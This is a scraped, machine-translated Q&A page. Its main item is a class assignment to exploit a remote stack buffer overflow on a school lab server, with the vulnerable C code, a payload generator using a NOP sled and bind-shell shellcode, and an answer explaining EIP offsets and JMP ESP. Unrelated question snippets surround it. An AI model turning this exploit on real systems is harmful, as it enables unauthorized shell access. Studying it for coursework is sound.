- c - 在位数组中找到第一个零
- linux - Unix 显示有关匹配两种模式之一的文件的信息
- 正则表达式替换多个文件
- linux - 隐藏来自 xtrace 的命令
它用于类作业。我有点卡住了,我只有一些问题可以帮助我继续前进。 (对我来说没有作弊:p)我认为本科类的残酷作业......
我们应该做的:
nc compName.cs.myschool.edu 9050
如果我们输入一些内容然后按 Ctrl+D,服务器就会监听/回显。我们需要使用该输入来破解服务器程序并创建一个具有 sudo 权限的帐户。
相关代码如下:
int main(int argc, char const *argv[])
{
char input[1000];
int sockfd, newsockfd, portno, clilen, val = 1;
struct sockaddr_in serv_addr, cli_addr;
// some server code that I don't understand but probably isn't super relevant
dup2(newsockfd, 0); // bind stdin
dup2(newsockfd, 1); // bind stdout
dup2(newsockfd, 2); // bind stderr
bufferCopy( input, 0x1000, stdin );
printf("You entered: %s\n", input );
close(newsockfd);
close(sockfd);
return 0;
}
void bufferCopy( char * input, int inputLen, FILE * file )
{
int i = 0;
int c = 0;
while( (c = fgetc( file )) != EOF && i < inputLen - 2 )
{
input[i++] = c;
}
input[i] = 0;
}
更新:我知道我需要做什么:
更新:我在做什么:
猫攻击代码 | nc compName.cs.myschool.edu 9090
static const int NUM_NOPS = 800;
static const char NOP = 0x90;
static const int NUM_ADDRESSES = 800;
static char nopSled[800];
char shellcode[] = { // on port 31334 == 0x7a66
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x66\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
};
static const char returnAddress[] = {0xbf, 0xff, 0xf4, 0x40};
int i=0;
for(i=0; i < NUM_NOPS; i++){
nopSled[i] = NOP;
}
FILE * pFile;
pFile = fopen("attackCode", "w");
fwrite( nopSled, 1, sizeof(nopSled), pFile );
fwrite( shellcode, 1, 92, pFile );
for(i=0; i < NUM_ADDRESSES; i++ ){
fwrite( returnAddress, 1, 4, pFile );
}
fclose(pFile);
更新:我不明白的是:
如有任何帮助,我们将不胜感激!
最佳答案
通常,您会执行以下步骤:
至于第一点,您已经找到了触发溢出的方法(基本上任何大于 1000 字节的输入值)。
由于堆栈上的缓冲区溢出会覆盖缓冲区地址以下的数据,并且由于 input
是在 main
函数帧的堆栈上分配的,因此缓冲区的某些部分将覆盖 main
调用的返回地址。要找出哪个部分覆盖了 EIP,可以使用 metasploit’s pattern_create and pattern_offset tools .
现在棘手的部分可能是找到一种有效修改 EIP 以跳转到您的 shellcode 的方法。使用这样的缓冲区:
AA…AA BBBB CC…CC
main
返回时的堆栈如下所示:
⋮
0x41414141
0x41414141
0x42424242 <= ESP
0x43434343
0x43434343
⋮
由于 return 将 EIP 设置为堆栈顶部的值(此处为 BBBB
)并通过减少堆栈指针来降低堆栈,因此 JMP ESP
将跳转在 BBBB
之前的 shellcode 右边:
⋮
0x41414141
0x41414141
0x42424242
0x43434343 <= ESP,EIP
0x43434343
⋮
要找到 JMP ESP
指令,请查看加载的模块/库并在 gdb 中检查它们:
find /b <from addr>, <to addr>, 0xff, 0xe4
找到一个 JMP ESP
的地址,您可以使用它来覆盖堆栈上的返回地址以跳转到您的 shellcode。
关于linux - 需要帮助找出远程缓冲区溢出,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/15262145/
我正在尝试用 C 语言编写一个使用 gstreamer 的 GTK+ 应用程序。 GTK+ 需要 gtk_main() 来执行。 gstreamer 需要 g_main_loop_run() 来执行。
我已经使用 apt-get 安装了 opencv。我得到了以下版本的opencv2,它工作正常: rover@rover_pi:/usr/lib/arm-linux-gnueabihf $ pytho
我有一个看起来像这样的 View 层次结构(基于其他答案和 Apple 的使用 UIScrollView 的高级 AutoLayout 指南): ScrollView 所需的2 个步骤是: 为 Scr
我尝试安装 udev。 udev 在 ./configure 期间给我一个错误 --exists: command not found configure: error: pkg-config and
我正在使用 SQLite 3。我有一个表,forums,有 150 行,还有一个表,posts,有大约 440 万行。每个帖子都属于一个论坛。 我想从每个论坛中选择最新帖子的时间戳。如果我使用 SEL
使用 go 和以下包: github.com/julienschmidt/httprouter github.com/shwoodard/jsonapi gopkg.in/mgo.v2/bson
The database仅包含 2 个表: 钱包(100 万行) 事务(1500 万行) CockroachDB 19.2.6 在 3 台 Ubuntu 机器上运行 每个 2vCPU 每个 8GB R
我很难理解为什么在下面的代码中直接调用 std::swap() 会导致编译错误,而使用 std::iter_swap 编译却没有任何错误. 来自 iter_swap() versus swap() -
我有一个非常简单的 SELECT *用 WHERE NOT EXISTS 查询条款。 SELECT * FROM "BMAN_TP3"."TT_SPLDR_55E63A28_59358" SELECT
我试图按部分组织我的 .css 文件,我需要从任何文件访问文件组中的任何类。在 Less 中,我可以毫无问题地创建一个包含所有文件导入的主文件,并且每个文件都导入主文件,但在 Sass 中,我收到一个
Microsoft.AspNet.SignalR.Redis 和 StackExchange.Redis.Extensions.Core 在同一个项目中使用。前者需要StackExchange.Red
这个问题在这里已经有了答案: Updating from Rails 4.0 to 4.1 gives sass-rails railties version conflicts (4 个答案) 关
我们有一些使用 Azure DevOps 发布管道部署到的现场服务器。我们已经使用这些发布管道几个月了,没有出现任何问题。今天,我们在下载该项目的工件时开始出现身份验证错误。 部署组中的节点显示在线,
Tip: instead of creating indexes here, run queries in your code – if you're missing any indexes, you
你能解释一下 Elm 下一个声明中的意思吗? (=>) = (,) 我在 Elm architecture tutorial 的例子中找到了它 最佳答案 这是中缀符号。实际上,这定义了一个函数 (=>
我需要一个 .NET 程序集查看器,它可以显示低级详细信息,例如元数据表内容等。 最佳答案 ildasm 是 IL 反汇编程序,具有低级托管元数据 token 信息。安装 Visual Studio
我有两个列表要在 Excel 中进行比较。这是一个很长的列表,我需要一个 excel 函数或 vba 代码来执行此操作。我已经没有想法了,因此转向你: **Old List** A
Closed. This question does not meet Stack Overflow guidelines。它当前不接受答案。 想要改善这个问题吗?更新问题,以便将其作为on-topi
我正在学习 xml 和 xml 处理。我无法很好地理解命名空间的存在。 我了解到命名空间帮助我们在 xml 中分离相同命名的元素。我们不能通过具有相同名称的属性来区分元素吗?为什么命名空间很重要或需要
我搜索了 Azure 文档、各种社区论坛和 google,但没有找到关于需要在公司防火墙上打开哪些端口以允许 Azure 所有组件(blob、sql、compute、bus、publish)的简洁声明
我是一名优秀的程序员,十分优秀!